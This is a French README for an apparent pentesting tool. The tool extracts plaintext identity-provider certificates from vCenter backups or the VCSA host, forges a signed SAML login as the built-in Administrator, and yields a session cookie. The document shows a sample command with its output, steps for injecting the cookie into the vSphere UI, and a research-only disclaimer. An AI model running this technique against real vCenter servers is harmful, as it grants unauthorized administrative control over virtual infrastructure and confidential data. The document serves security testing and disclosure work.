
Un outil pour extraire le certificat IdP des sauvegardes vCenter et se connecter en tant qu'Administrateur.
Un outil pour extraire le certificat du fournisseur d'identité (IdP) des sauvegardes vCenter et se connecter en tant qu'Administrateur
Généralement, lors de missions, nous accédons aux sauvegardes vCenter sur un serveur de fichiers ou obtenons un accès root à l'hôte VCSA via des CVE récentes. La connexion à l'interface vSphere de vCenter nous permet d'accéder facilement à davantage de systèmes, à des informations confidentielles, et de montrer aux clients l'impact de ces découvertes.
Le fichier data.mdb contient les certificats et peut être trouvé dans les sauvegardes vCenter ainsi que sur l'hôte VCSA avec les permissions root. Ces certificats sont stockés en clair et peuvent être utilisés pour signer n'importe quelle demande d'authentification SAML pour n'importe quel utilisateur - y compris l'Administrateur intégré.
Si vous souhaitez en savoir plus sur plusieurs cas d'utilisation de cet outil et sur la façon dont nous l'avons utilisé pour obtenir un accès administratif aux hôtes vCenter, consultez notre article de blog : https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
Avec le cookie ci-dessus, visitez l'instance VCSA à https://<VCSA>/ui, ajoutez le cookie sous le chemin /ui, puis naviguez à nouveau vers https://<VCSA>/ui.

Ce logiciel a été créé uniquement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.